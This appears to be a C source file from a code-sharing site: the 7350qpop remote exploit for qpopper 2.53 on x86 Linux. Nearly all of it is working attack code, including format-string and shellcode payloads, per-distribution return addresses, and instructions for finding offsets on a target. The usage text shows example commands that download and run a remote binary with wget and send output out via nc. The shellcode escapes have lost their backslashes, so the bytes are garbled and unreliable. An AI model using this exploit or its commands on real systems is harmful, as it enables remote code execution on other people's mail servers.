7350qpop.c
上传用户:wabaisheng
上传日期:2020-03-28
资源大小:4k
文件大小:13k
源码类别:

弱点检测代码

开发平台:

Visual C++

  1. /* qpopper 2.53 euidl x86/linux remote exploit
  2.  *
  3.  * public version released 2000/07/15
  4.  *
  5.  * 2000/05/30
  6.  * -scut/teso.
  7.  *
  8.  * discovered and first exploited by portal,
  9.  * further information by prizm and csh.
  10.  *
  11.  * greets to team teso, security.is, thc, adm, w00w00, hert
  12.  * special thanks to portal and csh for pointing some things out
  13.  *
  14.  * supply me with offsets (see below)
  15.  */
  16. #include <stdio.h>
  17. #include <stdlib.h>
  18. #include <unistd.h>
  19. #include <ctype.h>
  20. #include <string.h>
  21. #define SC_LEN          109     /* first shellcode length */
  22. #define D_PAD           1897    /* %-...d padding to expand the buffer */
  23. #define BODY_NOP_COUNT  8000
  24. #define BODY_LENGTH     8192
  25. /* 44 byte "read (3, <behind-me>, 8192)" x86/linux pic shellcode
  26.  * without 0x0a, 0x41-0x5b, 0x80-0x9f -sc.
  27.  * first smack
  28.  *
  29.  * it basically reads 8192 bytes behind itself and then jumps
  30.  * 120 bytes ahead into hopefully nop-space :-)
  31.  */
  32. unsigned char   shellcode[] =
  33.         "xebx22x5fx31xc0xf9x11xc7xf9xc0xd8x01"
  34.         "x31xc9x01xf9xaax31xdbxb3x03x31xc0xb0"
  35.         "x03x01xc1x31xd2xf9x66xc1xdax03xebx05"
  36.         "xe8xd9xffxffxffxcdx5fxebx78";
  37. /* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso
  38.  * second smack, read from message body
  39.  */
  40. unsigned char   ex_shellcode[] =
  41.         "xebx1fx5fx89xfcx66xf7xd4x31xc0x8ax07"
  42.         "x47x57xaex75xfdx88x67xffx48x75xf6x5b"
  43.         "x53x50x5ax89xe1xb0x0bxcdx80xe8xdcxff"
  44.         "xffxff";
  45. static int      sc_build (unsigned char *target, size_t target_len,
  46.         unsigned char *shellcode, char **argv);
  47. void    hexdump (unsigned char *cbegin, unsigned char *cend);
  48. void    sc_verify (unsigned char *sc, size_t length);
  49. typedef struct {
  50.         char *                  name;
  51.         unsigned long int       ret_addr;
  52.         unsigned long int       pop_pointer;
  53. } target_t;
  54. /* HOWTO get the offsets
  55.  *
  56.  * to aquire the offsets for an unknown version of QPOP 2.53 you have to have
  57.  * a POP-able account on the target system.
  58.  *
  59.  * do as follows:
  60.  *
  61.  * telnet smtp-server-for-target.target.com 25
  62.  *
  63.  * 220 smtp-server-for-target.target.com ready.
  64.  * MAIL FROM: <>
  65.  * 250 <<>> ... Sender Okay
  66.  * RCPT TO: <targetuser@target.com>
  67.  * 250 <targetuser@target.com> ... Recipient Okay
  68.  * DATA
  69.  * 354 Enter mail, end with "." on a line by itself
  70.  * Subject: footest
  71.  * From: %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
  72.  * .
  73.  * 250 Mail accepted
  74.  * QUIT
  75.  * 221 smtp-server-for-target.target.com closing connection
  76.  *
  77.  * now login via POP3:
  78.  *
  79.  * telnet pop.target.com 110
  80.  *
  81.  * +OK QPOP (version 2.53) at pop.target.com starting.
  82.  * USER targetuser
  83.  * +OK Password required for targetuser.
  84.  * PASS passbla
  85.  * +OK targetuser has 1 messages (1141 octets).
  86.  * EUIDL 1
  87.  * +OK 2 54a955db49a7de403d100a67618fee20 455 bfffd3c0.080505f1.bfffd3c0.000001c7.08052306.bfffdbd8.08054b6c.080518d4.
  88.  *
  89.  *                                                                                         ^^^^^^^^
  90.  * this is the POP pointer.
  91.  * the return address is POP pointer minus 0x08b0
  92.  *
  93.  * pop_pointer = 0xbfffdbd8 - 0x08b0 = 0xbfffd328
  94.  *
  95.  * The pop pointer has to be exact, if it hits one of the forbidden characters
  96.  * (0x0a, 0x41-0x5b, 0x80-0x9f) you're out of luck. The return address can be
  97.  * modified in a window of about 50 bytes, this is enough.
  98.  *
  99.  * please mail the following data to scut@nb.in-berlin.de in case you get
  100.  * it working on some default distribution:
  101.  *
  102.  * - exact distribution version
  103.  * - ls -l /usr/sbin/popper output (or wherever your popper binary lies)
  104.  * - file /usr/sbin/popper output
  105.  * - first seven stack variables (as in output below)
  106.  * - the following output: (echo VERSION;sleep 2)|telnet localhost 113
  107.  *   (in case you have a default identd installed)
  108.  *
  109.  * thank you very much, mail the whole stuff to scut@nb.in-berlin.de, i'll send
  110.  * you a copy with all known offsets back.
  111.  */
  112. target_t        targets[] = {
  113.         /* -rwxrwxr-x   1 scut     scut        39356 May 30 00:06 /tmp/popper */
  114.         /* 0x08054970.0xbfffdbd8.0x08051a1c.0x080496d0.0x00000005.0xbfffdbd8.0xbfffd7d8 */
  115.         { "Debian 2.1 source compilation",      0xbfffd328,     0xbfffdbd8 },
  116.         /* -rwxr-xr-x   1 root     root        38276 Jul 18  1998  /usr/sbin/in.qpopper */
  117.         /* /usr/sbin/in.qpopper: ELF 32-bit LSB executable, Intel 80386, version 1,
  118.          *                       dynamically linked (uses shared libs), stripped */
  119.         /* 0xbfffd410.0x0805042e.0xbfffd410.0x0000020a.0x080521e2.0xbfffdc28.0x080541c8 */
  120.         { "RedHat 6.1 RPM: qpopper-2.53-1-PAM", 0xbfffd378,     0xbfffdc28 },
  121.         /* -rwxr-xr-x   1 root     root        37776 Jun     1 13:17 /usr/sbin/popper */
  122.         /* 0xbfffd3b0.0x0804fc91.0xbfffd3b0.0x0000017d.0x08051986.0xbfffdbc8.0x080542c8 */
  123.         { "Slackware 7 default binary",         0xbfffd318,     0xbfffdbc8 },
  124.         /* 0xbfffefbc.0x0804f7be.0xbfffefbc.0x000001ca.0xbfffeba2.0xbffff7d4.0x0805245c */
  125.         { "SuSE 5.2 default binary",            0xbfffe2f2,     0xbfffeba2 },
  126.         /* -rwxr-xr-x   1 root     root        39700 Dec 11  1998 /usr/sbin/popper */
  127.         /* /usr/sbin/popper: ELF 32-bit LSB executable, Intel 80386, version 1,
  128.          *                   dynamically linked (uses shared libs), stripped */
  129.         /* 0xbfffd3c0.0x080505f1.0xbfffd3c0.0x000001ad.0x08052306.0xbfffdbd8.0x08054b6c */
  130.         { "SuSE 6.0 default binary",            0xbfffd328,     0xbfffdbd8 },
  131.         { NULL, 0, 0 },
  132. };
  133. static int
  134. sc_build (unsigned char *target, size_t target_len, unsigned char *shellcode,
  135.         char **argv)
  136. {
  137.         int     i;
  138.         size_t  tl_orig = target_len;
  139.         if (strlen (shellcode) >= (target_len - 1))
  140.                 return (-1);
  141.         memcpy (target, shellcode, strlen (shellcode));
  142.         target += strlen (shellcode);
  143.         target_len -= strlen (shellcode);
  144.         for (i = 0 ; argv[i] != NULL ; ++i)
  145.                 ;
  146.         /* set argument count
  147.          */
  148.         target[0] = (unsigned char) i;
  149.         target++;
  150.         target_len--;
  151.         for ( ; i > 0 ; ) {
  152.                 i -= 1;
  153.                 if (strlen (argv[i]) >= target_len)
  154.                         return (-1);
  155.                 printf ("[%3d/%3d] adding (%2d): %sn",
  156.                         (tl_orig - target_len), tl_orig,
  157.                         strlen (argv[i]), argv[i]);
  158.                 memcpy (target, argv[i], strlen (argv[i]));
  159.                 target += strlen (argv[i]);
  160.                 target_len -= strlen (argv[i]);
  161.                 target[0] = (unsigned char) (i + 1);
  162.                 target++;
  163.                 target_len -= 1;
  164.         }
  165.         return (tl_orig - target_len);
  166. }
  167. void
  168. hexdump (unsigned char *cbegin, unsigned char *cend)
  169. {
  170.         int             i;
  171.         unsigned char * buf = cbegin;
  172.         printf ("/* %d byte shellcode */n", cend - cbegin);
  173.         printf (""");
  174.         for (i = 0 ; buf < cend; ++buf) {
  175.                 printf ("\x%02x", *buf & 0xff);
  176.                 if (++i >= 12) {
  177.                         i = 0;
  178.                         printf (""n"");
  179.                 }
  180.         }
  181.         printf ("";nn");
  182. }
  183. void
  184. sc_verify (unsigned char *sc, size_t length)
  185. {
  186.         int     n,
  187.                 bc = 0;
  188.         for (n = length - 1 ; n >= 0 ; --n) {
  189.                 if (isupper (sc[n])) {
  190.                         printf ("upper char '%c' (%02x) at sc[%d]n",
  191.                                 sc[n], sc[n], n);
  192.                         bc += 1;
  193.                 } else if (sc[n] == 'x0a') {
  194.                         printf ("carriage return \x0a at sc[%d]n", n);
  195.                         bc += 1;
  196.                 } else if (sc[n] >= (unsigned char) 'x80' && sc[n] <= (unsigned char) 'x9f') {
  197.                         printf ("sendmail filtered character '\x%02x' at sc[%d], won't survive sendmailn",
  198.                                 sc[n], n);
  199.                 } else if (n != 0 && n != 2 && sc[n] == '%') {
  200.                         printf ("%% character may cause trouble at sc[%d]n", n);
  201.                 }
  202.         }
  203.         if (bc > 0) {
  204.                 printf ("%d invalid %s, aborting...n",
  205.                         bc, (bc == 1) ? "character" : "characters");
  206.                 exit (EXIT_FAILURE);
  207.         }
  208. }
  209. int
  210. main (int argc, char *argv[])
  211. {
  212.         int                     n,
  213.                                 i;
  214.         unsigned int            target_num;
  215.         target_t *              target;
  216.         unsigned char           mbuf[64];
  217.         unsigned char           tbuf[129];
  218.         unsigned char           xpbuf[129];
  219.         unsigned char           body[BODY_LENGTH];
  220.         unsigned char *         xbp = xpbuf;
  221.         unsigned long int       retaddr;
  222.         unsigned long int       poppointer;
  223.         printf ("7350qpop - qpopper 2.53 x86/linux remoten");
  224.         printf ("-scut / teso.nn");
  225.         if (argc < 5) {
  226.                 printf ("usage: %s <target> <source-email> <target-email> commands ...nn",
  227.                         argv[0]);
  228.                 printf ("target        target system typen");
  229.                 printf ("source-email  sender email address (has to get accepted)n");
  230.                 printf ("target-email  email user that will POP-get the emailn");
  231.                 printf ("commands      commands to run on the remote host,n");
  232.                 printf ("              example: /bin/sh -c "wget 1.1.1.1/a;chmod +x a;./a"nn");
  233.                 printf ("example:nn"
  234.                         "%s 1 foo@foobar.com user@example.com \n"
  235.                         "      /bin/sh -c "echo owned>/etc/issue" 2>&1 >/dev/null | nc example.com 25nn",
  236.                         argv[0]);
  237.                 printf ("the standard output is for the user, the error output contains the smtp-n"
  238.                         "output to send to the mail server.nn");
  239.                 printf ("targets:n");
  240.                 for (n = 0 ; targets[n].name != NULL ; ++n) {
  241.                         printf ("%8d : %40s : 0x%08x : 0x%08xn",
  242.                                 n, targets[n].name, (unsigned int) targets[n].ret_addr,
  243.                                 (unsigned int) targets[n].pop_pointer);
  244.                 }
  245.                 printf ("nsee the source file to see the method to get the offsets.nn");
  246.                 exit (EXIT_FAILURE);
  247.         }
  248.         if (sscanf (argv[1], "%u", &target_num) != 1) {
  249.                 printf ("target specification invalidn");
  250.                 exit (EXIT_FAILURE);
  251.         }
  252.         for (n = 0 ; targets[n].name != NULL && n < target_num ; ++n)
  253.                 ;
  254.         if (targets[n].name == NULL) {
  255.                 printf ("target number out of rangen");
  256.                 exit (EXIT_FAILURE);
  257.         }
  258.         target = &targets[n];
  259.         retaddr = target->ret_addr;
  260.         poppointer = target->pop_pointer;
  261.         /* construct first read() shellcode
  262.          */
  263.         memset (tbuf, 'x00', sizeof (tbuf));
  264.         printf ("constructing first shellcode...nn");
  265.         memcpy (tbuf, shellcode, strlen (shellcode));
  266.         n = strlen (shellcode);
  267.         printf ("shellcode size: %d bytesnn", n);
  268.         hexdump (tbuf, tbuf + n);
  269.         memset (mbuf, 'x00', sizeof (mbuf));
  270.         sprintf (mbuf, "%%-%dd", D_PAD);
  271.         sprintf (xbp, "<>%s", mbuf);
  272.         xbp += strlen (xbp);
  273.         for (n = 0 ; n < SC_LEN ; ++n) {
  274.                 xbp[0] = 'x5f';        /* nops0r replac0r (das) */
  275.                 xbp++;
  276.         }
  277.         xbp -= strlen (tbuf);
  278.         strcpy (xbp, tbuf);
  279.         xbp += strlen (xbp);
  280.         printf ("usingn");
  281.         printf ("   retaddr   : 0x%08xn", (unsigned int) retaddr);
  282.         printf ("   (POP *) p : 0x%08xnn", (unsigned int) poppointer);
  283.         /* _[ra]_[p]
  284.          */
  285.         xbp[0] = (retaddr      ) & 0xff;
  286.         xbp[1] = (retaddr >>  8) & 0xff;
  287.         xbp[2] = (retaddr >> 16) & 0xff;
  288.         xbp[3] = (retaddr >> 24) & 0xff;
  289.         xbp += 4;
  290.         /* [ra]_[p]_
  291.          */
  292.         xbp[0] = (poppointer      ) & 0xff;
  293.         xbp[1] = (poppointer >>  8) & 0xff;
  294.         xbp[2] = (poppointer >> 16) & 0xff;
  295.         xbp[3] = (poppointer >> 24) & 0xff;
  296.         xbp += 4;
  297.         xbp[0] = 'x00';
  298.         printf ("strlen (xpbuf) = %dn", strlen (xpbuf));
  299.         hexdump (xpbuf, xpbuf + strlen (xpbuf));
  300.         sc_verify (xpbuf, strlen (xpbuf));
  301.         printf ("shellcode passed verification, ready for delivery.n");
  302.         fprintf (stderr, "EHLO foobar.comn");
  303.         fprintf (stderr, "MAIL FROM: <%s>n", argv[2]);
  304.         fprintf (stderr, "RCPT TO: <%s>n", argv[3]);
  305.         fprintf (stderr, "DATAn");
  306.         fprintf (stderr, "Subject: Hellon");
  307.         fprintf (stderr, "From: %snn", xpbuf);
  308.         /* insert real shellcode
  309.          */
  310.         for (n = 0 ; n < BODY_NOP_COUNT ; ++n)
  311.                 body[n] = 'x90';
  312.         /* extra reliability armor (tm) to avoid line breakage
  313.          */
  314.         for (i = 0 ; i < (n - 132) ; i += 128) {
  315.                 body[i] = 'xeb';
  316.                 body[i+1] = 'x08';
  317.                 body[i+2] = 'x0a';
  318.         }
  319.         sc_build (&body[n], BODY_LENGTH - BODY_NOP_COUNT - 1, ex_shellcode,
  320.                 &argv[4]);
  321.         body[BODY_LENGTH - 1] = 'x00';
  322.         fprintf (stderr, "%sn", body);
  323.         fprintf (stderr, "n.nQUITn");
  324.         exit (EXIT_SUCCESS);
  325. }